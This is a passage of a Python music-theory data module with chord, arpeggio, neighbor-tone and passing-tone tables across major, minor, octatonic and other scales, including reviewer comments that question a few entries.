# to its triad; the 'Oct' and 'CArabic' scales map each note to a
# single-note "chord".  NOTE(review): Chords['DDim']['D'] is ['D','F','A'],
# which is a D minor triad, not a D diminished triad (['D','F','Gs']) --
# confirm whether this is intentional.
Chords = {
'DDim': {
'D': ['D', 'F', 'A'],
},
'CArabic': {
'C': ['C'],
'Cs': ['Cs'],
'E': [ 'E' ],
'F': ['F'],
'G': ['G'],
'Gs': ['Gs'],
'B': ['B'],
},
'COct': {
'C' : [ 'C' ],
'Cs': [ 'Cs'],
'Ds': [ 'Ds'],
'E' : [ 'E' ],
'Fs': [ 'Fs'],
'G' : [ 'G' ],
'A' : [ 'A' ],
'As': [ 'As'],
},
'CsOct': {
'Cs': [ 'Cs'],
'D' : [ 'D' ],
'E' : [ 'E' ],
'F' : [ 'F' ],
'G' : [ 'G' ],
'Gs': [ 'Gs'],
'As': [ 'As'],
'B' : [ 'B' ],
},
'DOct': {
'D' : [ 'D' ],
'Ds': [ 'Ds'],
'F' : [ 'F' ],
'Fs': [ 'Fs'],
'Gs': [ 'Gs'],
'A' : [ 'A' ],
'B' : [ 'B' ],
'C' : [ 'C' ],
},
'CMajor': {
'C': ['C', 'E', 'G'],
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'B'],
'F': ['F', 'A', 'C'],
'G': ['G', 'B', 'D'],
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'F'],
},
'CsMajor': {
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'C'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'Fs'],
},
'DMajor': {
'D': ['D', 'Fs', 'A'],
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'G': ['G', 'B', 'D'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'G'],
},
'DsMajor': {
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'D'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'D', 'F'],
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'Gs'],
},
'EMajor': {
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'A'],
},
'FMajor': {
'F': ['F', 'A', 'C'],
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'E'],
'As': ['As', 'D', 'F'],
'C': ['C', 'E', 'G'],
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'As'],
},
'FsMajor': {
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'F'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'B'],
},
'GMajor': {
'G': ['G', 'B', 'D'],
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'Fs'],
'C': ['C', 'E', 'G'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'C'],
},
'GsMajor': {
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'G'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'Cs'],
},
'AMajor': {
'A': ['A', 'Cs', 'E'],
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'D'],
},
'AsMajor': {
'As': ['As', 'D', 'F'],
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'A'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'A', 'C'],
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'Ds'],
},
'BMajor': {
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'E'],
},
'CMinor': {
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'Gs'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'D'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'D', 'F'],
},
'CsMinor': {
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'A'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'Ds', 'Fs'],
},
'DMinor': {
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'As'],
'F': ['F', 'A', 'C'],
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'E'],
'As': ['As', 'D', 'F'],
'C': ['C', 'E', 'G'],
},
'DsMinor': {
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'B'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'F'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'F', 'Gs'],
},
'EMinor': {
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'C'],
'G': ['G', 'B', 'D'],
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'Fs'],
'C': ['C', 'E', 'G'],
'D': ['D', 'Fs', 'A'],
},
'FMinor': {
'F': ['F', 'Gs', 'C'],
'G': ['G', 'As', 'Cs'],
'Gs': ['Gs', 'C', 'Ds'],
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'G'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'G', 'As'],
},
'FsMinor': {
'Fs': ['Fs', 'A', 'Cs'],
'Gs': ['Gs', 'B', 'D'],
'A': ['A', 'Cs', 'E'],
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'Gs', 'B'],
},
'GMinor': {
'G': ['G', 'As', 'D'],
'A': ['A', 'C', 'Ds'],
'As': ['As', 'D', 'F'],
'C': ['C', 'Ds', 'G'],
'D': ['D', 'F', 'A'],
'Ds': ['Ds', 'G', 'As'],
'F': ['F', 'A', 'C'],
},
'GsMinor': {
'Gs': ['Gs', 'B', 'Ds'],
'As': ['As', 'Cs', 'E'],
'B': ['B', 'Ds', 'Fs'],
'Cs': ['Cs', 'E', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'E': ['E', 'Gs', 'B'],
'Fs': ['Fs', 'As', 'Cs'],
},
'AMinor': {
'A': ['A', 'C', 'E'],
'B': ['B', 'D', 'F'],
'C': ['C', 'E', 'G'],
'D': ['D', 'F', 'A'],
'E': ['E', 'G', 'B'],
'F': ['F', 'A', 'C'],
'G': ['G', 'B', 'D'],
},
'AsMinor': {
'As': ['As', 'Cs', 'F'],
'C': ['C', 'Ds', 'Fs'],
'Cs': ['Cs', 'F', 'Gs'],
'Ds': ['Ds', 'Fs', 'As'],
'F': ['F', 'Gs', 'C'],
'Fs': ['Fs', 'As', 'Cs'],
'Gs': ['Gs', 'C', 'Ds'],
},
'BMinor': {
'B': ['B', 'D', 'Fs'],
'Cs': ['Cs', 'E', 'G'],
'D': ['D', 'Fs', 'A'],
'E': ['E', 'G', 'B'],
'Fs': ['Fs', 'A', 'Cs'],
'G': ['G', 'B', 'D'],
'A': ['A', 'Cs', 'E'],
},
}
# Chromatic note names in ascending order (sharps-only spelling); this list
# also fixes the per-root ordering of the generated chord dictionary below.
_NOTE_NAMES = ['C', 'Cs', 'D', 'Ds', 'E', 'F', 'Fs', 'G', 'Gs', 'A', 'As', 'B']
# Chord-quality suffix -> semitone offsets from the root.
_CHORD_RECIPES = (
    ('Major', (0, 4, 7)),
    ('Minor', (0, 3, 7)),
    ('Dim', (0, 3, 6)),
    ('7', (0, 4, 7, 10)),
    ('Maj7', (0, 4, 7, 11)),
    ('m7', (0, 3, 7, 10)),
)
# Every chord, keyed '<Root><Quality>' (e.g. 'CsMaj7', 'Bm7'), grouped per
# root in the order Major, Minor, Dim, 7, Maj7, m7 — 12 roots x 6 qualities.
AllChords = {
    root + suffix: [_NOTE_NAMES[(idx + step) % 12] for step in steps]
    for idx, root in enumerate(_NOTE_NAMES)
    for suffix, steps in _CHORD_RECIPES
}
# Arpeggio note sequences, keyed by chord name (same keys as AllChords).
# Triad/seventh chords carry six notes: the chord tones followed by extra
# tones (presumably passing/color tones — confirm against the generator code
# that consumes this table).  The 'Dim' entries instead hold the four
# diminished-seventh tones with the root repeated as a fifth, closing note.
# Note the Maj7 arpeggios often coincide with the plain Major ones
# (e.g. 'GMaj7' == 'GMajor', 'FMaj7' == 'FMajor').  Key order is arbitrary.
ArpChords = {
'AMinor' : [ 'A', 'C', 'E', 'F', 'G', 'B' ],
'CDim' : [ 'C', 'Ds', 'Fs', 'A', 'C' ],
'Gs7' : [ 'Gs', 'C', 'Ds', 'F', 'Fs', 'As' ],
'GMaj7' : [ 'G', 'B', 'D', 'E', 'Fs', 'A' ],
'GsDim' : [ 'Gs', 'B', 'D', 'F', 'Gs' ],
'GsMajor' : [ 'Gs', 'C', 'Ds', 'F', 'G', 'As' ],
'Fs7' : [ 'Fs', 'As', 'Cs', 'Ds', 'E', 'Gs' ],
'CMajor' : [ 'C', 'E', 'G', 'A', 'B', 'D' ],
'Em7' : [ 'E', 'G', 'B', 'C', 'D', 'Fs' ],
'Dsm7' : [ 'Ds', 'Fs', 'As', 'B', 'Cs', 'F' ],
'Gsm7' : [ 'Gs', 'B', 'Ds', 'E', 'Fs', 'As' ],
'DMaj7' : [ 'D', 'Fs', 'A', 'B', 'Cs', 'E' ],
'Dm7' : [ 'D', 'F', 'A', 'As', 'C', 'E' ],
'Cm7' : [ 'C', 'Ds', 'G', 'Gs', 'As', 'D' ],
'CsMinor' : [ 'Cs', 'E', 'Gs', 'A', 'B', 'Ds' ],
'FsMinor' : [ 'Fs', 'A', 'Cs', 'D', 'E', 'Gs' ],
'DsMaj7' : [ 'Ds', 'G', 'As', 'C', 'D', 'F' ],
'BMaj7' : [ 'B', 'Ds', 'Fs', 'Gs', 'As', 'Cs' ],
'GMajor' : [ 'G', 'B', 'D', 'E', 'Fs', 'A' ],
'EMinor' : [ 'E', 'G', 'B', 'C', 'D', 'Fs' ],
'CsMaj7' : [ 'Cs', 'F', 'Gs', 'As', 'C', 'Ds' ],
'FDim' : [ 'F', 'Gs', 'B', 'D', 'F' ],
'DMinor' : [ 'D', 'F', 'A', 'As', 'C', 'E' ],
'FMajor' : [ 'F', 'A', 'C', 'D', 'E', 'G' ],
'ADim' : [ 'A', 'C', 'Ds', 'Fs', 'A' ],
'CMinor' : [ 'C', 'Ds', 'G', 'Gs', 'As', 'D' ],
'EDim' : [ 'E', 'G', 'As', 'Cs', 'E' ],
'B7' : [ 'B', 'Ds', 'Fs', 'Gs', 'A', 'Cs' ],
'AMajor' : [ 'A', 'Cs', 'E', 'Fs', 'Gs', 'B' ],
'A7' : [ 'A', 'Cs', 'E', 'Fs', 'G', 'B' ],
'Fm7' : [ 'F', 'Gs', 'C', 'Cs', 'Ds', 'G' ],
'DsMajor' : [ 'Ds', 'G', 'As', 'C', 'D', 'F' ],
'E7' : [ 'E', 'Gs', 'B', 'Cs', 'D', 'Fs' ],
'C7' : [ 'C', 'E', 'G', 'A', 'As', 'D' ],
'GsMinor' : [ 'Gs', 'B', 'Ds', 'E', 'Fs', 'As' ],
'Bm7' : [ 'B', 'D', 'Fs', 'G', 'A', 'Cs' ],
'G7' : [ 'G', 'B', 'D', 'E', 'F', 'A' ],
'Asm7' : [ 'As', 'Cs', 'F', 'Fs', 'Gs', 'C' ],
'BMajor' : [ 'B', 'Ds', 'Fs', 'Gs', 'As', 'Cs' ],
'Ds7' : [ 'Ds', 'G', 'As', 'C', 'Cs', 'F' ],
'GsMaj7' : [ 'Gs', 'C', 'Ds', 'F', 'G', 'As' ],
'AsMinor' : [ 'As', 'Cs', 'F', 'Fs', 'Gs', 'C' ],
'BDim' : [ 'B', 'D', 'F', 'Gs', 'B' ],
'AsMajor' : [ 'As', 'D', 'F', 'G', 'A', 'C' ],
'AMaj7' : [ 'A', 'Cs', 'E', 'Fs', 'Gs', 'B' ],
'DMajor' : [ 'D', 'Fs', 'A', 'B', 'Cs', 'E' ],
'AsDim' : [ 'As', 'Cs', 'E', 'G', 'As' ],
'Fsm7' : [ 'Fs', 'A', 'Cs', 'D', 'E', 'Gs' ],
'Cs7' : [ 'Cs', 'F', 'Gs', 'As', 'B', 'Ds' ],
'Gm7' : [ 'G', 'As', 'D', 'Ds', 'F', 'A' ],
'DDim' : [ 'D', 'F', 'Gs', 'B', 'D' ],
'CsMajor' : [ 'Cs', 'F', 'Gs', 'As', 'C', 'Ds' ],
'FMinor' : [ 'F', 'Gs', 'C', 'Cs', 'Ds', 'G' ],
'EMajor' : [ 'E', 'Gs', 'B', 'Cs', 'Ds', 'Fs' ],
'As7' : [ 'As', 'D', 'F', 'G', 'Gs', 'C' ],
'F7' : [ 'F', 'A', 'C', 'D', 'Ds', 'G' ],
'FMaj7' : [ 'F', 'A', 'C', 'D', 'E', 'G' ],
'FsDim' : [ 'Fs', 'A', 'C', 'Ds', 'Fs' ],
'GDim' : [ 'G', 'As', 'Cs', 'E', 'G' ],
'GMinor' : [ 'G', 'As', 'D', 'Ds', 'F', 'A' ],
'CsDim' : [ 'Cs', 'E', 'G', 'As', 'Cs' ],
'DsDim' : [ 'Ds', 'Fs', 'A', 'C', 'Ds' ],
'EMaj7' : [ 'E', 'Gs', 'B', 'Cs', 'Ds', 'Fs' ],
'FsMaj7' : [ 'Fs', 'As', 'Cs', 'Ds', 'F', 'Gs' ],
'BMinor' : [ 'B', 'D', 'Fs', 'G', 'A', 'Cs' ],
'CMaj7' : [ 'C', 'E', 'G', 'A', 'B', 'D' ],
'AsMaj7' : [ 'As', 'D', 'F', 'G', 'A', 'C' ],
'D7' : [ 'D', 'Fs', 'A', 'B', 'C', 'E' ],
'Csm7' : [ 'Cs', 'E', 'Gs', 'A', 'B', 'Ds' ],
'FsMajor' : [ 'Fs', 'As', 'Cs', 'Ds', 'F', 'Gs' ],
'Am7' : [ 'A', 'C', 'E', 'F', 'G', 'B' ],
'DsMinor' : [ 'Ds', 'Fs', 'As', 'B', 'Cs', 'F' ],
}
# Diatonic neighbor tones: NeighborTones[scale][note] ->
# [upper neighbor, lower neighbor], both drawn from that scale.
# Besides the major/minor keys, this table includes octatonic scales
# ('DOct', 'COct', 'CsOct'), 'CArabic' (note set C Cs E F G Gs B) and
# 'CHMinor' (note set C D Ds F G Gs B, i.e. C harmonic minor).
NeighborTones = {
'GsMajor': {
'C': [ 'Cs', 'As' ],
'Gs': [ 'As', 'G' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'CMajor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
},
# NOTE(review): in 'DOct' the entries for 'B' (up -> 'D') and 'D'
# (down -> 'B') skip over 'C', even though 'C' is in the scale — the same
# skip appears in PassingTones['DOct'], so it may be intentional; confirm.
'DOct': {
'A': [ 'B', 'Gs' ],
'C': [ 'D', 'B' ],
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'A', 'Fs' ],
'D': [ 'Ds', 'B' ],
'F': [ 'Fs', 'Ds' ],
'B': [ 'D', 'A' ],
'Ds': [ 'F', 'D' ],
},
'BMinor': {
'A': [ 'B', 'G' ],
'Fs': [ 'G', 'E' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'Cs' ],
'G': [ 'A', 'Fs' ],
'B': [ 'Cs', 'A' ],
'Cs': [ 'D', 'B' ],
},
'CArabic': {
'C': [ 'Cs', 'B' ],
'B': [ 'C', 'Gs' ],
'Gs': [ 'B', 'G' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'E' ],
'Cs': [ 'E', 'C' ],
'E': [ 'F', 'Cs' ],
},
'CsMinor': {
'A': [ 'B', 'Gs' ],
'Fs': [ 'Gs', 'E' ],
'Gs': [ 'A', 'Fs' ],
'B': [ 'Cs', 'A' ],
'Cs': [ 'Ds', 'B' ],
'E': [ 'Fs', 'Ds' ],
'Ds': [ 'E', 'Cs' ],
},
'FsMinor': {
'A': [ 'B', 'Gs' ],
'B': [ 'Cs', 'A' ],
'Gs': [ 'A', 'Fs' ],
'D': [ 'E', 'Cs' ],
'Fs': [ 'Gs', 'E' ],
'Cs': [ 'D', 'B' ],
'E': [ 'Fs', 'D' ],
},
'GMajor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'Fs' ],
'Fs': [ 'G', 'E' ],
},
# NOTE(review): in 'COct' the entry for 'A' (up -> 'C') skips over 'As',
# which is in the scale — same pattern exists in PassingTones['COct'];
# confirm it is intentional.
'COct': {
'A': [ 'C', 'G' ],
'As': [ 'C', 'A' ],
'C': [ 'Cs', 'A' ],
'Fs': [ 'G', 'E' ],
'E': [ 'Fs', 'Ds' ],
'G': [ 'A', 'Fs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'E', 'Cs' ],
},
'EMinor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'Fs' ],
'Fs': [ 'G', 'E' ],
},
'DMinor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
'As': [ 'C', 'A' ],
},
'FMajor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
'As': [ 'C', 'A' ],
},
'CMinor': {
'C': [ 'D', 'As' ],
'Gs': [ 'As', 'G' ],
'D': [ 'Ds', 'C' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Ds': [ 'F', 'D' ],
},
'CsOct': {
'As': [ 'Cs', 'Gs' ],
'B': [ 'Cs', 'As' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'Cs' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'E' ],
'Cs': [ 'D', 'As' ],
'Gs': [ 'As', 'G' ],
},
'CsMajor': {
'C': [ 'Cs', 'As' ],
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'DsMajor': {
'C': [ 'D', 'As' ],
'Gs': [ 'As', 'G' ],
'D': [ 'Ds', 'C' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Ds': [ 'F', 'D' ],
},
'GsMinor': {
'B': [ 'Cs', 'As' ],
'E': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'Fs': [ 'Gs', 'E' ],
'Cs': [ 'Ds', 'B' ],
'Gs': [ 'As', 'Fs' ],
'Ds': [ 'E', 'Cs' ],
},
'BMajor': {
'Fs': [ 'Gs', 'E' ],
'E': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'B': [ 'Cs', 'As' ],
'Cs': [ 'Ds', 'B' ],
'Gs': [ 'As', 'Fs' ],
'Ds': [ 'E', 'Cs' ],
},
'AsMinor': {
'C': [ 'Cs', 'As' ],
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'AsMajor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'D': [ 'Ds', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'A' ],
'Ds': [ 'F', 'D' ],
},
'DsMinor': {
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'B': [ 'Cs', 'As' ],
'Cs': [ 'Ds', 'B' ],
'Ds': [ 'F', 'Cs' ],
},
'AMajor': {
'A': [ 'B', 'Gs' ],
'Fs': [ 'Gs', 'E' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'Cs' ],
'B': [ 'Cs', 'A' ],
'Cs': [ 'D', 'B' ],
'Gs': [ 'A', 'Fs' ],
},
'FMinor': {
'C': [ 'Cs', 'As' ],
'Gs': [ 'As', 'G' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'Gs' ],
'Cs': [ 'Ds', 'C' ],
'Ds': [ 'F', 'Cs' ],
},
'EMajor': {
'A': [ 'B', 'Gs' ],
'B': [ 'Cs', 'A' ],
'Gs': [ 'A', 'Fs' ],
'Fs': [ 'Gs', 'E' ],
'Cs': [ 'Ds', 'B' ],
'E': [ 'Fs', 'Ds' ],
'Ds': [ 'E', 'Cs' ],
},
'CHMinor': {
'C': [ 'D', 'B' ],
'B': [ 'C', 'Gs' ],
'Gs': [ 'B', 'G' ],
'D': [ 'Ds', 'C' ],
'G': [ 'Gs', 'F' ],
'F': [ 'G', 'Ds' ],
'Ds': [ 'F', 'D' ],
},
'GMinor': {
'A': [ 'As', 'G' ],
'C': [ 'D', 'As' ],
'D': [ 'Ds', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'Ds' ],
'As': [ 'C', 'A' ],
'Ds': [ 'F', 'D' ],
},
'AMinor': {
'A': [ 'B', 'G' ],
'C': [ 'D', 'B' ],
'B': [ 'C', 'A' ],
'E': [ 'F', 'D' ],
'D': [ 'E', 'C' ],
'G': [ 'A', 'F' ],
'F': [ 'G', 'E' ],
},
'FsMajor': {
'Fs': [ 'Gs', 'F' ],
'Gs': [ 'As', 'Fs' ],
'F': [ 'Fs', 'Ds' ],
'As': [ 'B', 'Gs' ],
'B': [ 'Cs', 'As' ],
'Cs': [ 'Ds', 'B' ],
'Ds': [ 'F', 'Cs' ],
},
'DMajor': {
'A': [ 'B', 'G' ],
'B': [ 'Cs', 'A' ],
'E': [ 'Fs', 'D' ],
'D': [ 'E', 'Cs' ],
'G': [ 'A', 'Fs' ],
'Fs': [ 'G', 'E' ],
'Cs': [ 'D', 'B' ],
},
}
# Passing-tone runs: PassingTones[scale][note] ->
# [ [next two scale tones ascending], [next three scale tones descending] ],
# e.g. PassingTones['CMajor']['C'] == [['D', 'E'], ['B', 'A', 'G']].
# Same scale set as NeighborTones (majors, minors, 'DOct'/'COct'/'CsOct',
# 'CArabic', 'CHMinor'); the octatonic sections show the same tone-skips
# noted on NeighborTones.
PassingTones = {
'GsMajor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'G', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'G' ], ['Cs', 'C', 'As'] ],
},
'CMajor': {
'A': [ [ 'B', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'E': [ [ 'F', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'F' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'DOct': {
'A': [ [ 'B', 'D' ], ['Gs', 'Fs', 'F'] ],
'C': [ [ 'D', 'Ds' ], ['B', 'A', 'Gs'] ],
'Fs': [ [ 'Gs', 'A' ], ['F', 'Ds', 'D'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['B', 'A', 'Gs'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'D', 'B'] ],
'B': [ [ 'D', 'Ds' ], ['A', 'Gs', 'Fs'] ],
'Ds': [ [ 'F', 'Fs' ], ['D', 'B', 'A'] ],
},
'BMinor': {
'A': [ [ 'B', 'Cs' ], ['G', 'Fs', 'E'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'Cs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'Cs', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'G', 'Fs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
},
'CArabic': {
'C': [ [ 'Cs', 'E' ], ['B', 'Gs', 'G'] ],
'B': [ [ 'C', 'Cs' ], ['Gs', 'G', 'F'] ],
'Gs': [ [ 'B', 'C' ], ['G', 'F', 'E'] ],
'G': [ [ 'Gs', 'B' ], ['F', 'E', 'Cs'] ],
'F': [ [ 'G', 'Gs' ], ['E', 'Cs', 'C'] ],
'Cs': [ [ 'E', 'F' ], ['C', 'B', 'Gs'] ],
'E': [ [ 'F', 'G' ], ['Cs', 'C', 'B'] ],
},
'CsMinor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'Ds', 'Cs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'Ds'] ],
'B': [ [ 'Cs', 'Ds' ], ['A', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'A', 'Gs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
},
'FsMinor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'Gs', 'Fs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'D', 'Cs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'Gs'] ],
'E': [ [ 'Fs', 'Gs' ], ['D', 'Cs', 'B'] ],
},
'GMajor': {
'A': [ [ 'B', 'C' ], ['G', 'Fs', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'Fs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'COct': {
'A': [ [ 'C', 'Cs' ], ['G', 'Fs', 'E'] ],
'As': [ [ 'C', 'Cs' ], ['A', 'G', 'Fs'] ],
'C': [ [ 'Cs', 'Ds' ], ['A', 'G', 'Fs'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'Ds', 'Cs'] ],
'E': [ [ 'Fs', 'G' ], ['Ds', 'Cs', 'C'] ],
'G': [ [ 'A', 'C' ], ['Fs', 'E', 'Ds'] ],
'Cs': [ [ 'Ds', 'E' ], ['C', 'A', 'G'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'C', 'A'] ],
},
'EMinor': {
'A': [ [ 'B', 'C' ], ['G', 'Fs', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'Fs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'DMinor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['As', 'A', 'G'] ],
